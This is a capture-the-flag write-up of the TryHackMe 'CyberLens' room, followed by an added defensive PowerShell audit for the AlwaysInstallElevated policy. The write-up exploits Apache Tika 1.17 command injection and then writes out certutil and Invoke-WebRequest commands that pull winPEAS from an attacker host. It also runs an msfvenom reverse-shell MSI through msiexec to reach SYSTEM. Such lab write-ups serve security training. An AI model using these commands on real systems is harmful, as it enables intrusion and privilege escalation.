---
# System prepended metadata

title: THM-CyberLens
tags: [TryHackMe]

---

# THM-CyberLens
![image](https://hackmd.io/_uploads/rkkiTxiAle.png)
![image](https://hackmd.io/_uploads/H1_XRgj0lg.png)
![image](https://hackmd.io/_uploads/BJAL0gs0ge.png)
Scrolling down the web page we can see a file upload.
![image](https://hackmd.io/_uploads/ryRl1-o0gg.png)
I checked the source code to see how it works but stumbled into something interesting.
![image](https://hackmd.io/_uploads/rJOGyWs0gx.png)
You can see there is another website on port 61777.
![image](https://hackmd.io/_uploads/ryRDJ-i0gl.png)
It’s running [Apache Tika 1.17](https://www.exploit-db.com/exploits/47208). A quick search on Google reveals that this version is vulnerable to command injection.
I use Metasploit to get a shell.
![image](https://hackmd.io/_uploads/rJyXfWiAeg.png)
![image](https://hackmd.io/_uploads/S13Nf-j0lg.png)
![image](https://hackmd.io/_uploads/HyHBf-iRll.png)
I use `shell` to open cmd.
![image](https://hackmd.io/_uploads/Sy4M7ZoRxl.png)
![image](https://hackmd.io/_uploads/HJ1BXbiRgx.png)
I upload winPEAS to the target machine:
```
certutil -urlcache -f http://10.6.4.204:1234/winPEAS.exe winpeas.exe
Invoke-WebRequest -Uri http://10.6.4.204:1234/winPEAS.exe -OutFile winpeas.exe
```
![image](https://hackmd.io/_uploads/ryw0BbiAgg.png)
![image](https://hackmd.io/_uploads/r1rkIZo0ex.png)
![image](https://hackmd.io/_uploads/HJ4QUWoCxx.png)
One interesting result I find is AlwaysInstallElevated. AlwaysInstallElevated is a Windows policy setting that permits Windows Installer packages (.msi files) to be installed with administrative privileges.
![image](https://hackmd.io/_uploads/SyAtK-iRge.png)
Let's look it up on the internet. I find [this blog](https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/), which has a method to get root.
I use msfvenom to create a .msi file that opens a reverse shell.
![image](https://hackmd.io/_uploads/SyYLcbsAgg.png)
I upload the file to the target machine.
![image](https://hackmd.io/_uploads/Bk0T9-oRll.png)
![image](https://hackmd.io/_uploads/B1U0cboCeg.png)
After uploading the file, I run the command `msiexec /quiet /qn /i ignite.msi` to execute ignite.msi, making sure to use nc to catch the reverse shell.
![image](https://hackmd.io/_uploads/SJL7ibsCex.png)
I have gained SYSTEM privileges on the target, meaning I can now do anything I want.
![image](https://hackmd.io/_uploads/H1I_jbsAlg.png)
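
A defender-side audit for the AlwaysInstallElevated setting described above, as an added example that is not part of the original writeup. Windows Installer only elevates when the value is 1 in both the machine hive and the user's hive, so the script reports each loaded user profile against the machine value; the function names are hypothetical.

```powershell
# Added example: audit AlwaysInstallElevated for the machine and every loaded user hive.
# The policy takes effect only when the DWORD is 1 in BOTH HKLM and the user's hive.
$SubKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
$Name   = 'AlwaysInstallElevated'

function Get-PolicyValue {
    param([string]$Path)
    # Returns the DWORD value, or $null when the key or the value is absent.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -ne $item) { return [int]$item.$Name }
    return $null
}

function Get-AlwaysInstallElevatedAudit {
    $machine = Get-PolicyValue -Path "Registry::HKEY_LOCAL_MACHINE\$SubKey"

    # HKEY_USERS holds one subkey per loaded profile; skip the *_Classes hives.
    $sids = Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -notlike '*_Classes' } |
        Select-Object -ExpandProperty PSChildName

    foreach ($sid in $sids) {
        $user = Get-PolicyValue -Path "Registry::HKEY_USERS\$sid\$SubKey"
        [pscustomobject]@{
            Sid          = $sid
            MachineValue = $machine
            UserValue    = $user
            # True only when both halves of the policy are enabled for this profile.
            Effective    = ($machine -eq 1 -and $user -eq 1)
        }
    }
}

function Disable-AlwaysInstallElevated {
    # Remediation: remove the machine-wide value (requires an elevated prompt).
    # Without the HKLM value, a per-user value alone does not elevate installs.
    Remove-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\$SubKey" `
        -Name $Name -ErrorAction SilentlyContinue
}

Get-AlwaysInstallElevatedAudit | Format-Table -AutoSize
```

Run it from an elevated PowerShell session so that other users' loaded hives are readable; profiles that are not logged on are not loaded under `HKEY_USERS` and are not covered.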




